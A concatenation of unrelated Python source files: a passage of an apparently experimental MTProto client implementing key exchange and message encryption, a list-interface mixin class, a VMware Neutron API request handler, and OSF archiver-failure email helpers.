print(self.server_DH_params)
self.tmp_aes_key, self.tmp_aes_iv = self._create_tmp_aes_keys()
self.server_DH_inner_data = self._decrypt_Server_DH_inner_data()
print(self.server_DH_inner_data)
self.client_DH_inner_data = self._create_client_DH_inner_data()
print(self.client_DH_inner_data)
data = self.client_DH_inner_data.to_boxed_bytes()
data_with_sha = SHA1(data) + data
data_with_sha_padded = data_with_sha + os.urandom(-len(data_with_sha) % 16)
encrypted_data = crypt.ige_encrypt(data_with_sha_padded, self.tmp_aes_key, self.tmp_aes_iv)
g_a = self.server_DH_inner_data.g_a.to_int(byteorder='big')
dh_prime = self.server_DH_inner_data.dh_prime.to_int(byteorder='big')
b = self.b
new_nonce = self.p_q_inner_data.new_nonce.to_bytes()
for i in range(1, self.AUTH_MAX_RETRY): # retry when dh_gen_retry or dh_gen_fail
set_client_DH_params = tl.set_client_DH_params(
nonce=self.resPQ.nonce,
server_nonce=self.resPQ.server_nonce,
encrypted_data=tl.bytes_c(encrypted_data)
)
self.send_plaintext_message(set_client_DH_params.to_bytes())
self.set_client_DH_params_answer = tl.Set_client_DH_params_answer.from_stream(BytesIO(self.recv_plaintext_message()))
set_client_DH_params_answer = self.set_client_DH_params_answer
# print set_client_DH_params_answer
auth_key = pow(g_a, b, dh_prime)
auth_key_str = long_to_bytes(auth_key)
auth_key_sha = SHA1(auth_key_str)
auth_key_aux_hash = auth_key_sha[:8]
new_nonce_hash1 = SHA1(new_nonce+b'\x01'+auth_key_aux_hash)[-16:]
new_nonce_hash2 = SHA1(new_nonce+b'\x02'+auth_key_aux_hash)[-16:]
new_nonce_hash3 = SHA1(new_nonce+b'\x03'+auth_key_aux_hash)[-16:]
assert set_client_DH_params_answer.nonce == self.resPQ.nonce
assert set_client_DH_params_answer.server_nonce == self.resPQ.server_nonce
if set_client_DH_params_answer.number == tl.dh_gen_ok_c.number:
print(set_client_DH_params_answer.new_nonce_hash1, new_nonce_hash1)
assert set_client_DH_params_answer.new_nonce_hash1.to_bytes() == new_nonce_hash1
print("Diffie Hellman key exchange processed successfully")
self.server_salt = strxor(new_nonce[0:8], self.resPQ.server_nonce.to_bytes()[0:8])
self.auth_key.set_key(auth_key_str)
print("Auth key generated")
return "Auth Ok"
elif set_client_DH_params_answer.number == tl.dh_gen_retry_c.number:
assert set_client_DH_params_answer.new_nonce_hash2.to_bytes() == new_nonce_hash2
print("Retry Auth")
elif set_client_DH_params_answer.status == tl.dh_gen_fail_c.number:
assert set_client_DH_params_answer.new_nonce_hash3.to_bytes() == new_nonce_hash3
print("Auth Failed")
raise Exception("Auth Failed")
else:
raise Exception("Response Error")
def generate_message_id(self):
msg_id = int(time() * 2**32)
if self.last_message_id > msg_id:
msg_id = self.last_message_id + 1
while msg_id % 4 is not 0:
msg_id += 1
return msg_id
def send_plaintext_message(self, message_data): # package message, not chat message
msg = MTProtoUnencryptedMessage.new(self.generate_message_id(), message_data)
self.send_tcp_message(msg)
def recv_plaintext_message(self):
tcp_msg = self.recv_tcp_message()
msg = MTProtoUnencryptedMessage.from_bytes(tcp_msg.payload)
if msg.is_encrypted():
raise ValueError('did not get a plaintext message')
return msg.message_data
def send_encrypted_message(self, message_data):
"""
Ecrypted Message:
auth_key_id:int64 | msg_key:int128 | encrypted_data:bytes
Encrypted Message: encrypted_data
salt:int64 | session_id:int64 | message_id:int64 | seq_no:int32 |
message_data_length:int32 | message_data:bytes | padding 0..15:bytes
"""
if self.session_id is None:
self.session_id = self.random.getrandbits(64).to_bytes(8, 'little')
msg = MTProtoEncryptedMessage.new(
int.from_bytes(self.server_salt, 'little'),
int.from_bytes(self.session_id, 'little'),
self.generate_message_id(),
1,
message_data)
msg = msg.encrypt(self.auth_key)
self.send_tcp_message(msg)
def recv_encrypted_message(self):
tcp_msg = self.recv_tcp_message()
msg = MTProtoEncryptedMessage.from_bytes(tcp_msg.payload)
msg = msg.decrypt(self.auth_key)
print('message_data:', to_hex(msg.encrypted_data.message_data))
"""
at this point, message_data looks a lot like this:
message_data:
Msg container -> DCF8F173
Vector<%Message>
num_items:int -> 02000000
%Message:
message_id:long -> 01D40F39 3BBFA055
seq_no:int -> 01000000
bytes:int -> 1C000000
body:Object ->
new_session_created -> 0809C29E
first_msg_id:long -> 00C8A02B 3BBFA055
unique_id:long -> 1A1D5711 00A96EC3
server_salt:long -> 74EEA560 D1AB64E3
%Message:
message_id -> 01541139 3BBFA055
seq_no:int -> 02000000
bytes:int -> 14000000
body:Object ->
msg_acks -> 59B4D662
Vector<long> -> 15C4B51C
count -> 01000000
long -> 00C8A02B 3BBFA055
"""
def send_tcp_message(self, mproto_message):
tcp_msg = MTProtoTCPMessage.new(self.number, mproto_message)
tcp_msg_data = tcp_msg.to_bytes()
print(to_hex(tcp_msg_data))
self.socket.write(tcp_msg_data)
self.number += 1
def recv_tcp_message(self):
tcp_msg = MTProtoTCPMessage.from_stream(self.socket)
if not tcp_msg.crc_ok():
raise ValueError('mproto_message checksum for tcp does not match')
return tcp_msg
def __del__(self):
# cleanup
self._socket.close()
class MTProtoMessage:
@classmethod
def from_tcp_msg(cls, tcp_msg):
if cls is MTProtoMessage:
if tcp_msg.payload[0:8] == b'\x00\x00\x00\x00\x00\x00\x00\x00':
return MTProtoUnencryptedMessage(tcp_msg.payload)
else:
return MTProtoEncryptedMessage(tcp_msg.payload)
else:
return cls(tcp_msg)
def is_encrypted(self):
return self.auth_key_id != 0
class MTProtoEncryptedMessage(namedtuple('MTProtoEncryptedMessage',
'auth_key_id msg_key encrypted_data'), MTProtoMessage):
"""
Ecrypted Message:
auth_key_id:int64 | msg_key:int128 | encrypted_data:bytes
Encrypted Message: encrypted_data
salt:int64 | session_id:int64 | message_id:int64 | seq_no:int32 | message_data_length:int32 | message_data:bytes | padding 0..15:bytes
"""
class EncryptedData(namedtuple('EncrypedData', 'salt session_id message_id seq_no message_data_length message_data')):
_header_struct = Struct('<QQQII')
@classmethod
def new(cls, salt, session_id, message_id, seq_no, message_data):
return cls(salt, session_id, message_id, seq_no, len(message_data), message_data)
def generate_padding(self):
return os.urandom((16 - (32 + len(self.message_data)) % 16) % 16)
def to_bytes(self):
return self._header_struct.pack(self.salt, self.session_id, self.message_id, self.seq_no, self.message_data_length) + self.message_data
@classmethod
def from_bytes(cls, data):
parts = list(cls._header_struct.unpack(data[0:32]))
message_data_length = parts[-1]
parts.append(data[32:32+message_data_length])
return cls(*parts)
@classmethod
def new(cls, salt, session_id, message_id, seq_no, message_data):
encrypted_data = cls.EncryptedData.new(salt, session_id, message_id, seq_no, message_data)
return cls(None, None, encrypted_data)
def encrypt(self, auth_key):
unencryped_data = self.encrypted_data.to_bytes()
msg_key = SHA1(unencryped_data)[-16:]
unencryped_data += self.encrypted_data.generate_padding()
assert len(unencryped_data) % 16 == 0
encrypted_data = aes_encrypt(unencryped_data, auth_key, msg_key)
return MTProtoEncryptedMessage(auth_key.key_id, msg_key, encrypted_data)
def decrypt(self, auth_key):
decrypted_data = aes_decrypt(self.encrypted_data, auth_key, self.msg_key)
return self._replace(encrypted_data=MTProtoEncryptedMessage.EncryptedData.from_bytes(decrypted_data))
@classmethod
def from_bytes(cls, data):
return cls(data[0:8], data[8:24], data[24:])
def to_bytes(self):
return b''.join((self.auth_key_id, self.msg_key, self.encrypted_data,))
class MTProtoTCPMessage(namedtuple('MTProtoTCPMessage', 'data')):
@classmethod
def new(cls, seq_no, mtproto_msg):
payload = mtproto_msg.to_bytes()
header_and_payload = bytes().join([
int.to_bytes(len(payload) + 12, 4, 'little'),
int.to_bytes(seq_no, 4, 'little'),
payload
])
crc = tl.int_c._to_bytes(crc32(header_and_payload))
return cls(header_and_payload + crc)
@classmethod
def from_stream(cls, stream):
length_bytes = stream.read(4)
length = int.from_bytes(length_bytes, 'little')
return cls(length_bytes + stream.read(length))
@property
def length(self):
return int.from_bytes(self.data[0:4], 'little')
@property
def seq_no(self):
return int.from_bytes(self.data[4:8], 'little')
@property
def payload(self):
return self.data[8:-4]
@property
def crc(self):
return int.from_bytes(self.data[-4:], 'little')
def crc_ok(self):
return self.crc == crc32(self.data[:-4])
def to_bytes(self):
return self.data
# class MTProtoClient:
# def __init__(self, config, session_id=None):
# self.api_id = config.get('app', 'api_id')
# self.api_hash = config.get('app', 'api_hash')
# self.app_title = config.get('app', 'app_title')
# self.short_name = config.get('app', 'short_name')
# self.public_keys = config.get('servers', 'public_keys')
# self.test_dc = dc.DataCenter(config.get('servers', 'test_dc'))
# self.productinon_dc = dc.DataCenter(config.get('servers', 'production_dc'))
# # if self.use_test_dc:
# self.datacenter = self.test_dc
# # else:
# # self.datacenter = self.productinon_dc
# # self.datacenter = dc.DataCenter('tcp://127.0.0.1:8888')
# if session_id is None:
# self.session = MTProtoSession.new()
# print('creating new session: {}'.format(self.session))
# else:
# self.session = MTProtoSession(session_id)
# print('continuing session: {}'.format(self.session))
# @asyncio.coroutine
# def run(self, loop):
# while True:
# # self.get_nearest_dc()
# yield from asyncio.sleep(1)
# def compare(self):
# MTProto('FFFFFFFFF', 'EEEEEEEE', self.public_keys)
# def init(self, loop):
# # MTProto('FFFFFFFFF', 'EEEEEEEE', self.public_keys)
# asyncio.async(self.run(loop))
# self.datacenter.init(loop)
# # def add_to_run_loop(self, loop):
# # from . connection import MTProtoConnection
# # self.conn = MTProtoConnection('TCP')
# # coro = loop.create_connection(lambda: self.conn, '127.0.0.1', 8888)
# # loop.run_until_complete(coro)
# # loop.run_until_complete(self.run())
# class MTProtoClientProtocol(asyncio.Protocol):
# _header_struct = Struct('<QI')
# last_message_id = 0
# def __init__(self, server_info):
# self._ingress = asyncio.Queue()
# self._egress = asyncio.Queue()
# self._mtproto_transport = None
# @asyncio.coroutine
# def get_ingress(self):
# result = yield from self._ingress.get()
# return result
# @asyncio.coroutine
# def send_insecure_message(self, msg_data):
# message_id = generate_message_id(self.last_message_id)
# mtproto_msg = memoryview(bytearray(self._header_struct.size + len(msg_data)))
# self._header_struct.pack_into(mtproto_msg, 8, message_id, len(msg_data))
# mtproto_msg[-len(msg_data):] = msg_data
# self.last_message_id = message_id
# self.transport.write(mtproto_msg)
# @asyncio.coroutine
# def send_encrypted_message(self, msg):
# yield from self._egress.put(msg)
# def create_connection(self, *args, **kwargs):
# raise NotImplementedError()
# def generate_message_id(last_message_id):
# from time import time
# msg_id = int(time() * 2**32)
# if last_message_id > msg_id:
# msg_id = last_message_id + 1
# while msg_id % 4 is not 0:
# msg_id += 1
# return msg_id
class MTProtoUnencryptedMessage(
namedtuple('MTProtoUnencryptedMessage', 'message_id message')):
"""
Unencrypted Message:
auth_key_id = 0:int64 message_id:int64 message_data_length:int32 message_data:bytes
"""
_header_struct = Struct('<QQI')
def __new__(cls, message_id, message):
return super().__new__(cls, scheme.int64_c(message_id), message)
# message_data = msg.get_bytes()
# return super().__new__(cls,
# auth_key_id=scheme.int64_c(0),
# message_id=scheme.int64_c(message_id),
# message_data_length=scheme.int32_c(len(message_data)),
# message_data=message_data)
auth_key_id = scheme.int64_c(0).get_bytes()
@classmethod
def from_bytes(cls, data):
auth_key_id, message_id, message_data_length = cls._header_struct.unpack(data[0:20])
return super().__new__(cls, auth_key_id, message_id, message_data_length, data[20:])
def get_bytes(self):
message_data = self.message.get_bytes()
message_data_length = scheme.int32_c(len(message_data)).get_bytes()
message_id = self.message_id.get_bytes()
mtproto_msg = bytes().join((self.auth_key_id, message_id, message_data_length, message_data),)
return mtproto_msg
class MTProtoClient:
def __init__(self, session_data=None):
self._transport = None
self._ingress = asyncio.Queue()
self._egress = asyncio.Queue()
self.last_message_id = 0
@asyncio.coroutine
def _handle_egress(self):
done = False
while not done:
msg = yield from self._egress.get()
log.debug('_handle_egress: {}'.format(msg))
while self._transport is None:
yield from asyncio.sleep(.1)
yield from self._transport.send(msg.get_bytes())
@asyncio.coroutine
def _handle_ingress(self):
done = False
while not done:
msg = yield from self._ingress.get()
self.transport.send(msg.get_bytes())
yield from asyncio.sleep(1)
@asyncio.coroutine
def _handle_connection(self, loop):
if self._transport is None:
log.debug('no transport, creating one now')
self._transport = MTProtoTransport('TCP')
coro = loop.create_connection(lambda: self._transport, '149.154.167.40', 443)
asyncio.async(coro)
done = False
while not done:
yield from asyncio.sleep(1)
def generate_message_id(self):
msg_id = int(time() * 2**32)
if self.last_message_id > msg_id:
msg_id = self.last_message_id + 1
while msg_id % 4 is not 0:
msg_id += 1
return msg_id
@asyncio.coroutine
def send_unencrypted_message(self, msg_obj):
unencrypted_message = MTProtoUnencryptedMessage(self.generate_message_id(), msg_obj)
yield from self._egress.put(unencrypted_message)
def send_encrypted_message(self, msg_obj):
raise NotImplementedError()
@asyncio.coroutine
def async_run(self, loop):
self._transport = MTProtoTransport('TCP')
done = False
while not done:
yield from asyncio.sleep(1)
@asyncio.coroutine
def create_authorization_key(self):
yield from self.send_unencrypted_message(scheme.req_pq(nonce=SystemRandom().getrandbits(128)))
def run(self):
loop = asyncio.get_event_loop()
self._transport = MTProtoTransport('TCP')
try:
loop.run_in_executor(None, self._transport.run())
asyncio.async(self._handle_egress())
asyncio.async(self._handle_ingress())
# asyncio.async(self._handle_connection(loop))
# asyncio.async(self.async_run(loop))
# asyncio.async(self.create_authorization_key())
loop.run_forever()
except KeyboardInterrupt:
print('exiting due to KeyboardInterrupt')
finally:
loop.close()
def main():
client = MTProtoClient()
client.run()
# dc = DataCenter('tcp://149.154.167.40:443')
# loop = asyncio.get_event_loop()
# asyncio.async(dc.async_run(loop), loop=loop)
# loop.run_forever()
# loop.close()
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2008-2009 Aryeh Leib Taurog, all rights reserved.
# Released under the New BSD license.
"""
This module contains a base type which provides list-style mutations
without specific data storage methods.
See also http://static.aryehleib.com/oldsite/MutableLists.html
Author: Aryeh Leib Taurog.
"""
from functools import total_ordering
@total_ordering
class ListMixin:
"""
A base class which provides complete list interface.
Derived classes must call ListMixin's __init__() function
and implement the following:
function _get_single_external(self, i):
Return single item with index i for general use.
The index i will always satisfy 0 <= i < len(self).
function _get_single_internal(self, i):
Same as above, but for use within the class [Optional]
Note that if _get_single_internal and _get_single_internal return
different types of objects, _set_list must distinguish
between the two and handle each appropriately.
function _set_list(self, length, items):
Recreate the entire object.
NOTE: items may be a generator which calls _get_single_internal.
Therefore, it is necessary to cache the values in a temporary:
temp = list(items)
before clobbering the original storage.
function _set_single(self, i, value):
Set the single item at index i to value [Optional]
If left undefined, all mutations will result in rebuilding
the object using _set_list.
function __len__(self):
Return the length
int _minlength:
The minimum legal length [Optional]
int _maxlength:
The maximum legal length [Optional]
type or tuple _allowed:
A type or tuple of allowed item types [Optional]
"""
_minlength = 0
_maxlength = None
# ### Python initialization and special list interface methods ###
def __init__(self, *args, **kwargs):
if not hasattr(self, '_get_single_internal'):
self._get_single_internal = self._get_single_external
if not hasattr(self, '_set_single'):
self._set_single = self._set_single_rebuild
self._assign_extended_slice = self._assign_extended_slice_rebuild
super().__init__(*args, **kwargs)
def __getitem__(self, index):
"Get the item(s) at the specified index/slice."
if isinstance(index, slice):
return [self._get_single_external(i) for i in range(*index.indices(len(self)))]
else:
index = self._checkindex(index)
return self._get_single_external(index)
def __delitem__(self, index):
"Delete the item(s) at the specified index/slice."
if not isinstance(index, (int, slice)):
raise TypeError("%s is not a legal index" % index)
# calculate new length and dimensions
origLen = len(self)
if isinstance(index, int):
index = self._checkindex(index)
indexRange = [index]
else:
indexRange = range(*index.indices(origLen))
newLen = origLen - len(indexRange)
newItems = (self._get_single_internal(i)
for i in range(origLen)
if i not in indexRange)
self._rebuild(newLen, newItems)
def __setitem__(self, index, val):
"Set the item(s) at the specified index/slice."
if isinstance(index, slice):
self._set_slice(index, val)
else:
index = self._checkindex(index)
self._check_allowed((val,))
self._set_single(index, val)
# ### Special methods for arithmetic operations ###
def __add__(self, other):
'add another list-like object'
return self.__class__(list(self) + list(other))
def __radd__(self, other):
'add to another list-like object'
return other.__class__(list(other) + list(self))
def __iadd__(self, other):
'add another list-like object to self'
self.extend(list(other))
return self
def __mul__(self, n):
'multiply'
return self.__class__(list(self) * n)
def __rmul__(self, n):
'multiply'
return self.__class__(list(self) * n)
def __imul__(self, n):
'multiply'
if n <= 0:
del self[:]
else:
cache = list(self)
for i in range(n - 1):
self.extend(cache)
return self
def __eq__(self, other):
olen = len(other)
for i in range(olen):
try:
c = self[i] == other[i]
except IndexError:
# self must be shorter
return False
if not c:
return False
return len(self) == olen
def __lt__(self, other):
olen = len(other)
for i in range(olen):
try:
c = self[i] < other[i]
except IndexError:
# self must be shorter
return True
if c:
return c
elif other[i] < self[i]:
return False
return len(self) < olen
# ### Public list interface Methods ###
# ## Non-mutating ##
def count(self, val):
"Standard list count method"
count = 0
for i in self:
if val == i:
count += 1
return count
def index(self, val):
"Standard list index method"
for i in range(0, len(self)):
if self[i] == val:
return i
raise ValueError('%s not found in object' % val)
# ## Mutating ##
def append(self, val):
"Standard list append method"
self[len(self):] = [val]
def extend(self, vals):
"Standard list extend method"
self[len(self):] = vals
def insert(self, index, val):
"Standard list insert method"
if not isinstance(index, int):
raise TypeError("%s is not a legal index" % index)
self[index:index] = [val]
def pop(self, index=-1):
"Standard list pop method"
result = self[index]
del self[index]
return result
def remove(self, val):
"Standard list remove method"
del self[self.index(val)]
def reverse(self):
"Standard list reverse method"
self[:] = self[-1::-1]
def sort(self, cmp=None, key=None, reverse=False):
"Standard list sort method"
if key:
temp = [(key(v), v) for v in self]
temp.sort(key=lambda x: x[0], reverse=reverse)
self[:] = [v[1] for v in temp]
else:
temp = list(self)
if cmp is not None:
temp.sort(cmp=cmp, reverse=reverse)
else:
temp.sort(reverse=reverse)
self[:] = temp
# ### Private routines ###
def _rebuild(self, newLen, newItems):
if newLen and newLen < self._minlength:
raise ValueError('Must have at least %d items' % self._minlength)
if self._maxlength is not None and newLen > self._maxlength:
raise ValueError('Cannot have more than %d items' % self._maxlength)
self._set_list(newLen, newItems)
def _set_single_rebuild(self, index, value):
self._set_slice(slice(index, index + 1, 1), [value])
def _checkindex(self, index, correct=True):
length = len(self)
if 0 <= index < length:
return index
if correct and -length <= index < 0:
return index + length
raise IndexError('invalid index: %s' % index)
def _check_allowed(self, items):
if hasattr(self, '_allowed'):
if False in [isinstance(val, self._allowed) for val in items]:
raise TypeError('Invalid type encountered in the arguments.')
def _set_slice(self, index, values):
"Assign values to a slice of the object"
try:
iter(values)
except TypeError:
raise TypeError('can only assign an iterable to a slice')
self._check_allowed(values)
origLen = len(self)
valueList = list(values)
start, stop, step = index.indices(origLen)
# CAREFUL: index.step and step are not the same!
# step will never be None
if index.step is None:
self._assign_simple_slice(start, stop, valueList)
else:
self._assign_extended_slice(start, stop, step, valueList)
def _assign_extended_slice_rebuild(self, start, stop, step, valueList):
'Assign an extended slice by rebuilding entire list'
indexList = range(start, stop, step)
# extended slice, only allow assigning slice of same size
if len(valueList) != len(indexList):
raise ValueError('attempt to assign sequence of size %d '
'to extended slice of size %d'
% (len(valueList), len(indexList)))
# we're not changing the length of the sequence
newLen = len(self)
newVals = dict(zip(indexList, valueList))
def newItems():
for i in range(newLen):
if i in newVals:
yield newVals[i]
else:
yield self._get_single_internal(i)
self._rebuild(newLen, newItems())
def _assign_extended_slice(self, start, stop, step, valueList):
'Assign an extended slice by re-assigning individual items'
indexList = range(start, stop, step)
# extended slice, only allow assigning slice of same size
if len(valueList) != len(indexList):
raise ValueError('attempt to assign sequence of size %d '
'to extended slice of size %d'
% (len(valueList), len(indexList)))
for i, val in zip(indexList, valueList):
self._set_single(i, val)
def _assign_simple_slice(self, start, stop, valueList):
'Assign a simple slice; Can assign slice of any length'
origLen = len(self)
stop = max(start, stop)
newLen = origLen - stop + start + len(valueList)
def newItems():
for i in range(origLen + 1):
if i == start:
for val in valueList:
yield val
if i < origLen:
if i < start or i >= stop:
yield self._get_single_internal(i)
self._rebuild(newLen, newItems())
|
|
# Copyright 2012 VMware, Inc.
#
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import abc
import copy
import httplib
import time
import eventlet
from oslo_utils import excutils
import six
import six.moves.urllib.parse as urlparse
from neutron.i18n import _LI, _LW
from neutron.openstack.common import log as logging
from neutron.plugins.vmware import api_client
LOG = logging.getLogger(__name__)
DEFAULT_HTTP_TIMEOUT = 30
DEFAULT_RETRIES = 2
DEFAULT_REDIRECTS = 2
DEFAULT_API_REQUEST_POOL_SIZE = 1000
DEFAULT_MAXIMUM_REQUEST_ID = 4294967295
DOWNLOAD_TIMEOUT = 180
@six.add_metaclass(abc.ABCMeta)
class ApiRequest(object):
'''An abstract baseclass for all ApiRequest implementations.
This defines the interface and property structure for both eventlet and
gevent-based ApiRequest classes.
'''
# List of allowed status codes.
ALLOWED_STATUS_CODES = [
httplib.OK,
httplib.CREATED,
httplib.NO_CONTENT,
httplib.MOVED_PERMANENTLY,
httplib.TEMPORARY_REDIRECT,
httplib.BAD_REQUEST,
httplib.UNAUTHORIZED,
httplib.FORBIDDEN,
httplib.NOT_FOUND,
httplib.CONFLICT,
httplib.INTERNAL_SERVER_ERROR,
httplib.SERVICE_UNAVAILABLE
]
@abc.abstractmethod
def start(self):
pass
@abc.abstractmethod
def join(self):
pass
@abc.abstractmethod
def copy(self):
pass
def _issue_request(self):
'''Issue a request to a provider.'''
conn = (self._client_conn or
self._api_client.acquire_connection(True,
copy.copy(self._headers),
rid=self._rid()))
if conn is None:
error = Exception(_("No API connections available"))
self._request_error = error
return error
url = self._url
LOG.debug("[%(rid)d] Issuing - request url: %(conn)s "
"body: %(body)s",
{'rid': self._rid(), 'conn': self._request_str(conn, url),
'body': self._body})
issued_time = time.time()
is_conn_error = False
is_conn_service_unavail = False
response = None
try:
redirects = 0
while (redirects <= self._redirects):
# Update connection with user specified request timeout,
# the connect timeout is usually smaller so we only set
# the request timeout after a connection is established
if conn.sock is None:
conn.connect()
conn.sock.settimeout(self._http_timeout)
elif conn.sock.gettimeout() != self._http_timeout:
conn.sock.settimeout(self._http_timeout)
headers = copy.copy(self._headers)
cookie = self._api_client.auth_cookie(conn)
if cookie:
headers["Cookie"] = cookie
gen = self._api_client.config_gen
if gen:
headers["X-Nvp-Wait-For-Config-Generation"] = gen
LOG.debug("Setting X-Nvp-Wait-For-Config-Generation "
"request header: '%s'", gen)
try:
conn.request(self._method, url, self._body, headers)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.warn(_LW("[%(rid)d] Exception issuing request: "
"%(e)s"),
{'rid': self._rid(), 'e': e})
response = conn.getresponse()
response.body = response.read()
response.headers = response.getheaders()
elapsed_time = time.time() - issued_time
LOG.debug("[%(rid)d] Completed request '%(conn)s': "
"%(status)s (%(elapsed)s seconds)",
{'rid': self._rid(),
'conn': self._request_str(conn, url),
'status': response.status,
'elapsed': elapsed_time})
new_gen = response.getheader('X-Nvp-Config-Generation', None)
if new_gen:
LOG.debug("Reading X-Nvp-config-Generation response "
"header: '%s'", new_gen)
if (self._api_client.config_gen is None or
self._api_client.config_gen < int(new_gen)):
self._api_client.config_gen = int(new_gen)
if response.status == httplib.UNAUTHORIZED:
if cookie is None and self._url != "/ws.v1/login":
# The connection still has no valid cookie despite
# attempts to authenticate and the request has failed
# with unauthorized status code. If this isn't a
# a request to authenticate, we should abort the
# request since there is no point in retrying.
self._abort = True
# If request is unauthorized, clear the session cookie
# for the current provider so that subsequent requests
# to the same provider triggers re-authentication.
self._api_client.set_auth_cookie(conn, None)
elif response.status == httplib.SERVICE_UNAVAILABLE:
is_conn_service_unavail = True
if response.status not in [httplib.MOVED_PERMANENTLY,
httplib.TEMPORARY_REDIRECT]:
break
elif redirects >= self._redirects:
LOG.info(_LI("[%d] Maximum redirects exceeded, aborting "
"request"), self._rid())
break
redirects += 1
conn, url = self._redirect_params(conn, response.headers,
self._client_conn is None)
if url is None:
response.status = httplib.INTERNAL_SERVER_ERROR
break
LOG.info(_LI("[%(rid)d] Redirecting request to: %(conn)s"),
{'rid': self._rid(),
'conn': self._request_str(conn, url)})
# yield here, just in case we are not out of the loop yet
eventlet.greenthread.sleep(0)
# If we receive any of these responses, then
# our server did not process our request and may be in an
# errored state. Raise an exception, which will cause the
# the conn to be released with is_conn_error == True
# which puts the conn on the back of the client's priority
# queue.
if (response.status == httplib.INTERNAL_SERVER_ERROR and
response.status > httplib.NOT_IMPLEMENTED):
LOG.warn(_LW("[%(rid)d] Request '%(method)s %(url)s' "
"received: %(status)s"),
{'rid': self._rid(), 'method': self._method,
'url': self._url, 'status': response.status})
raise Exception(_('Server error return: %s'), response.status)
return response
except Exception as e:
if isinstance(e, httplib.BadStatusLine):
msg = (_("Invalid server response"))
else:
msg = unicode(e)
if response is None:
elapsed_time = time.time() - issued_time
LOG.warn(_LW("[%(rid)d] Failed request '%(conn)s': '%(msg)s' "
"(%(elapsed)s seconds)"),
{'rid': self._rid(), 'conn': self._request_str(conn, url),
'msg': msg, 'elapsed': elapsed_time})
self._request_error = e
is_conn_error = True
return e
finally:
# Make sure we release the original connection provided by the
# acquire_connection() call above.
if self._client_conn is None:
self._api_client.release_connection(conn, is_conn_error,
is_conn_service_unavail,
rid=self._rid())
def _redirect_params(self, conn, headers, allow_release_conn=False):
"""Process redirect response, create new connection if necessary.
Args:
conn: connection that returned the redirect response
headers: response headers of the redirect response
allow_release_conn: if redirecting to a different server,
release existing connection back to connection pool.
Returns: Return tuple(conn, url) where conn is a connection object
to the redirect target and url is the path of the API request
"""
url = None
for name, value in headers:
if name.lower() == "location":
url = value
break
if not url:
LOG.warn(_LW("[%d] Received redirect status without location "
"header field"), self._rid())
return (conn, None)
# Accept location with the following format:
# 1. /path, redirect to same node
# 2. scheme://hostname:[port]/path where scheme is https or http
# Reject others
# 3. e.g. relative paths, unsupported scheme, unspecified host
result = urlparse.urlparse(url)
if not result.scheme and not result.hostname and result.path:
if result.path[0] == "/":
if result.query:
url = "%s?%s" % (result.path, result.query)
else:
url = result.path
return (conn, url) # case 1
else:
LOG.warn(_LW("[%(rid)d] Received invalid redirect location: "
"'%(url)s'"), {'rid': self._rid(), 'url': url})
return (conn, None) # case 3
elif result.scheme not in ["http", "https"] or not result.hostname:
LOG.warn(_LW("[%(rid)d] Received malformed redirect "
"location: %(url)s"),
{'rid': self._rid(), 'url': url})
return (conn, None) # case 3
# case 2, redirect location includes a scheme
# so setup a new connection and authenticate
if allow_release_conn:
self._api_client.release_connection(conn)
conn_params = (result.hostname, result.port, result.scheme == "https")
conn = self._api_client.acquire_redirect_connection(conn_params, True,
self._headers)
if result.query:
url = "%s?%s" % (result.path, result.query)
else:
url = result.path
return (conn, url)
def _rid(self):
'''Return current request id.'''
return self._request_id
@property
def request_error(self):
'''Return any errors associated with this instance.'''
return self._request_error
def _request_str(self, conn, url):
'''Return string representation of connection.'''
return "%s %s/%s" % (self._method, api_client.ctrl_conn_to_str(conn),
url)
|
|
import functools
from framework.auth import Auth
from website.archiver import (
StatResult, AggregateStatResult,
ARCHIVER_NETWORK_ERROR,
ARCHIVER_SIZE_EXCEEDED,
ARCHIVER_FILE_NOT_FOUND,
ARCHIVER_FORCED_FAILURE,
)
from website import (
mails,
settings
)
from osf.utils.sanitize import unescape_entities
def send_archiver_size_exceeded_mails(src, user, stat_result, url):
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.ARCHIVE_SIZE_EXCEEDED_DESK,
user=user,
src=src,
stat_result=stat_result,
can_change_preferences=False,
url=url,
)
mails.send_mail(
to_addr=user.username,
mail=mails.ARCHIVE_SIZE_EXCEEDED_USER,
user=user,
src=src,
can_change_preferences=False,
)
def send_archiver_copy_error_mails(src, user, results, url):
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.ARCHIVE_COPY_ERROR_DESK,
user=user,
src=src,
results=results,
url=url,
can_change_preferences=False,
)
mails.send_mail(
to_addr=user.username,
mail=mails.ARCHIVE_COPY_ERROR_USER,
user=user,
src=src,
results=results,
can_change_preferences=False,
)
def send_archiver_file_not_found_mails(src, user, results, url):
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.ARCHIVE_FILE_NOT_FOUND_DESK,
can_change_preferences=False,
user=user,
src=src,
results=results,
url=url,
)
mails.send_mail(
to_addr=user.username,
mail=mails.ARCHIVE_FILE_NOT_FOUND_USER,
user=user,
src=src,
results=results,
can_change_preferences=False,
)
def send_archiver_uncaught_error_mails(src, user, results, url):
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.ARCHIVE_UNCAUGHT_ERROR_DESK,
user=user,
src=src,
results=results,
can_change_preferences=False,
url=url,
)
mails.send_mail(
to_addr=user.username,
mail=mails.ARCHIVE_UNCAUGHT_ERROR_USER,
user=user,
src=src,
results=results,
can_change_preferences=False,
)
def handle_archive_fail(reason, src, dst, user, result):
url = settings.INTERNAL_DOMAIN + src._id
if reason == ARCHIVER_NETWORK_ERROR:
send_archiver_copy_error_mails(src, user, result, url)
elif reason == ARCHIVER_SIZE_EXCEEDED:
send_archiver_size_exceeded_mails(src, user, result, url)
elif reason == ARCHIVER_FILE_NOT_FOUND:
send_archiver_file_not_found_mails(src, user, result, url)
elif reason == ARCHIVER_FORCED_FAILURE: # Forced failure using scripts.force_fail_registration
pass
else: # reason == ARCHIVER_UNCAUGHT_ERROR
send_archiver_uncaught_error_mails(src, user, result, url)
dst.root.sanction.forcibly_reject()
